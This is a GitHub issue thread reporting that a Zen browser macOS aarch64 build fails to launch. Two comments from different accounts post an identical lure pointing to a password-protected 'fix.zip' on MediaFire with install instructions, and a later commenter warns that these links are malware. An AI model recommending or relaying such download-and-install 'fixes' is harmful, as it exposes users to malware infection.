### ISSUE TITLE
macOS aarch64 build is broken

### ISSUE THREAD

**Issue by ingorichter** [zen-browser/desktop#920]
### What happened?

Downloaded this dmg https://github.com/zen-browser/desktop/releases/download/1.0.0-a.30/zen.macos-aarch64.dmg and I get this error when launching zen
<img width="260" alt="Screenshot 2024-08-26 at 10 39 01 AM" src="https://github.com/user-attachments/assets/279fc265-4030-4178-a693-45a37bdb8356">

The error persist no matter if I try to launch directly from the mounted dmg or if I copy the app to the `Applications` folder

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0

### Severity impact

Medium

### What platform are you seeing the problem on?

macOS - aarch64

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ch4og** [comment]
Don't download anything from links above there is malware. 

Here is info about installing on macos: https://github.com/zen-browser/desktop/issues/53
